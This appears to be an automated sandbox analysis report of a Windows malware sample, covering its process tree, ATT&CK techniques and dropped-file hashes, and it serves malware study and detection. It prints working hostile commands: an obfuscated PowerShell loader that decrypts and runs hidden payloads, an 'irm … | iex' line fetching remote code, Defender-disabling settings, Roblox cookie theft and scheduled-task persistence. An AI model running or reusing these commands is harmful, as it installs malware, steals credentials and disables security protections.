        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1268
  - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
      "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1656
    - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        5⤵
        
        PID:1108
      - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        6⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        7⤵
        
        PID:444
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        8⤵
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        
        PID:3028
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        13⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        13⤵
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        12⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        12⤵
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        11⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        11⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        10⤵
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        10⤵
        
        PID:1304
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:2328
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        11⤵
        Views/modifies file attributes
        
        PID:1788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        11⤵
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        
        PID:2896
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        11⤵
        
        PID:2928
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        11⤵
        
        PID:2964
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:2068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2088
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:1860
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1656
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1056
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        9⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        9⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        8⤵
        
        PID:1032
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        8⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        7⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        7⤵
        
        PID:1744
      - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        6⤵
        
        PID:1376
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        7⤵
        
        PID:556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        8⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        7⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1908
      - C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        6⤵
        
        PID:892
    - - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        5⤵
        
        PID:1396
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        6⤵
        
        PID:2940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        7⤵
        
        PID:3016
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        6⤵
        
        PID:2268
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2428
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB348.tmp.bat""
        6⤵
        
        PID:3060
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:1816
    - - C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        5⤵
        
        PID:1744
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Windows\system32\net.exe
      net file
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2416
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        5⤵
        
        PID:264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:636
- - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
    "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2644
  - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
      "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
      4⤵
      Executes dropped EXE
      PID:2784
  - - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
      "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1736
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        5⤵
        
        PID:2220
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        6⤵
        
        PID:2208
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        5⤵
        
        PID:628
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2820
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpAE0B.tmp.bat""
        5⤵
        
        PID:1224
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:2760
  - - C:\Users\Admin\AppData\Local\Temp\sihost.exe
      "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1680
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2424
    - - C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        5⤵
        Views/modifies file attributes
        
        PID:3068
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        5⤵
        
        PID:1488
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:788
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1660
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:2636
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        5⤵
        
        PID:2156
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        5⤵
        
        PID:2852
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:1604
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:612
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2932
    - - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2764
      - C:\Windows\system32\PING.EXE
        
        ping localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1uUdVxzP6dAYjZ7

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe

Filesize
8.2MB

MD5
2bcf4d81fc953d9abce674d4721633d4

SHA1
7310f555418c254aba6f520b2ee72fb7cebb8763

SHA256
5069ad2bcd0ef590b340cdd8be3f262c560faa17f8774664499cdf7d04cf9393

SHA512
7bfb72dd930f6346479a5e346ee817e7cecafca4ad5a4ee6a8e987c5278aa13813f3e17166d178ff957e1f23d2ecf63f01b62965e423b1d9a4be8d2b8be3b934

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe

Filesize
2.7MB

MD5
8a14259150f471ec328687c9bcedd5b1

SHA1
e8c2ae02e49c4b5d1eb8494410574ba7a5c61119

SHA256
6994b5ff8d1589088cac1984216f3d15bf42d8c04f27f2795a557565e2e94ed1

SHA512
a6d2466793a863b3b213900ec3d8b8066c409cb8b7a917bfe0c2c51f308afc94a7c08fe17d78d972f18bc0cdbef826af428250ae92007dedbbfbc85ec3d65bd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe

Filesize
21.3MB

MD5
ad2f02cf9676881547f696f59d30a816

SHA1
8c7e3e9ce36fd74db6d725fe086ff693508ab10c

SHA256
40857dd4534f369a1b94e042f794c2d0b858bb856dcff16df61bb4b66df890e5

SHA512
bee0fc3646a4967eb363e671525659187561e2be63f295295ba5635f8a2aaea1867739bda06637447348ca254f270ad9a564e1c11b70995897e238b9f749e2c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cxc.bat

Filesize
259KB

MD5
4e949e2528cffcf3c51c0fb9185a3b4e

SHA1
c48dc3493e75bce32680fce6ec42b11bc5cfb8c9

SHA256
ecef254e99e36a376c8fdc4dfbb99c0593b4fd2270437df3821990021278ec0a

SHA512
284be4b7215b882bb55e7df727c16628a692ce8e0dc974220e7f9b542bef9fafbb20a7db41df176e4c52142035375048638476577c594ebb8392b24346f0e619

Download Submit
C:\Users\Admin\AppData\Local\Temp\di9OWmDIQlU96Ji

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\sihost.exe

Filesize
230KB

MD5
c44a5f5978d95c5f2267b24b29f0f512

SHA1
c9f4fd16130ed87437faa002138d36cbbfa06aaa

SHA256
55dd738b5ccada8533d959d0652cdd8f768cc183fa924424e310bb3d4d811a49

SHA512
46be2766736c4d0eb3a4a7a0b847b683fbb21747e64e4a967cf0b4798f77ecac8594f98f0b6f3d29c9f0d507bb711dee9cffabff21708357ba0a9dabf035b4fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAE0B.tmp.bat

Filesize
153B

MD5
3fd7fd4374e339b4c4d71f1cc87aab4b

SHA1
923cdf118a1b0e78936a81e3ca7711bc670a7bd2

SHA256
257eefca7b0c43b1707c09f96619194e81cab43a624721010d6f2a397ff02b3b

SHA512
efaf7bf08f51bf57563cb3a6e17f73259e73af430c880e896a4cc260fa17d6da258dbfa632823760c24a597a8ec93ea9ef9e4cdc796f203ef15fe037f4c7ab40

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB348.tmp.bat

Filesize
153B

MD5
ec391961188be235d71913dae0b34c44

SHA1
b4280de8808829b959a1be47ff263630e106b87c

SHA256
5527745dcb538a6f4f9e34af982db6a13774a99f707ffc6b96f8dd3b4aed1a94

SHA512
e34498682dc00746513157f4f09c4f6e3852e0b5ac4b5385f94bd26b91e5fa57696b3a5edb2fcf9f07f781b80d64337004ef20a3c38b65392e281b1cdc741555

Download Submit
C:\Users\Admin\AppData\Local\Temp\tpckJcGAm01FUj7\Display\Display.png

Filesize
369KB

MD5
ae42193ace544abae0875aff844398b5

SHA1
99950b6509c065a08c0e1d7b286aa91efeb7dd03

SHA256
e145e8b62087ddd4cf7edc8e851ea1504883a0011f0d5b7ed6ec643059bda150

SHA512
d7b6981577b24fc4cc6f96eec71f6dc921f61ef2fa219ea9b439e6bd458b98decfc340cd8e813e2e17008063ae3b5ffd301bf28685bf67d353cea532a729ab54

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
44bbbe9fdec541da39a4346eccba67dd

SHA1
0c74459cd642d094e0426c249df3185a8c9ee186

SHA256
512a82b738d432bed6a7b9283c1a5407111ef8c82a0bc1009b34cdb69de276e9

SHA512
a387100e45d60a512ec8612f0da122d73ddccf6351b7fae4da74651c9093e2666ef5f46669f3ee6d51cadf77f7ce7085953809f334b7986f57e80e40bd8d4619

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
cc203a5c4c85535b304dd1356fd559bc

SHA1
cd8d220664df8ef48973ffe7ff33043eb485ded2

SHA256
2bf27ff1fac661fca401d2188d6547acc8f35f01df71d672cccf9983be63e02d

SHA512
9b3d31b39b3a6578b7c2a25b2b3474720f8a543c85c700200a81c7f8edf35ea5e6a6152e78b1671f9fba2f779c0b80b86aa96e4a9eb92db18de4895c214c81d0

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
577f27e6d74bd8c5b7b0371f2b1e991c

SHA1
b334ccfe13792f82b698960cceaee2e690b85528

SHA256
0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

SHA512
944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

Download Submit
memory/612-241-0x0000000002990000-0x0000000002998000-memory.dmp

Filesize
32KB

Download
memory/612-240-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/636-33-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/636-34-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/664-361-0x000007FEEDCC0000-0x000007FEEE65D000-memory.dmp

Filesize
9.6MB

Download
memory/788-119-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/788-124-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/916-88-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/916-89-0x0000000002080000-0x0000000002088000-memory.dmp

Filesize
32KB

Download
memory/1268-66-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/1268-67-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/1488-100-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/1488-98-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/1572-220-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/1572-221-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download
memory/1660-174-0x0000000001C90000-0x0000000001C98000-memory.dmp

Filesize
32KB

Download
memory/1660-173-0x000000001B570000-0x000000001B852000-memory.dmp

Filesize
2.9MB

Download
memory/1680-58-0x0000000001230000-0x0000000001270000-memory.dmp

Filesize
256KB

Download
memory/1688-549-0x0000000001290000-0x00000000012D0000-memory.dmp

Filesize
256KB

Download
memory/1736-60-0x00000000012B0000-0x000000000156A000-memory.dmp

Filesize
2.7MB

Download
memory/2644-27-0x0000000001040000-0x000000000187E000-memory.dmp

Filesize
8.2MB

Download
memory/2692-328-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2700-8-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

Filesize
9.9MB

Download
memory/2700-0-0x000007FEF5AB3000-0x000007FEF5AB4000-memory.dmp

Filesize
4KB

Download
memory/2700-2-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

Filesize
9.9MB

Download
memory/2700-1-0x00000000002A0000-0x00000000017F4000-memory.dmp

Filesize
21.3MB

Download
memory/2896-341-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/2908-10-0x0000000000E10000-0x0000000002362000-memory.dmp

Filesize
21.3MB

Download
memory/2908-11-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

Filesize
9.9MB

Download
memory/2908-9-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

Filesize
9.9MB

Download
memory/2908-28-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

Filesize
9.9MB

Download
memory/3020-743-0x00000000012B0000-0x00000000012F0000-memory.dmp

Filesize
256KB

Download
memory/3060-303-0x0000000000200000-0x0000000000300000-memory.dmp

Filesize
1024KB

Download
memory/3060-302-0x0000000000200000-0x0000000000300000-memory.dmp

Filesize
1024KB

Download
memory/3060-301-0x0000000000200000-0x0000000000300000-memory.dmp

Filesize
1024KB

Download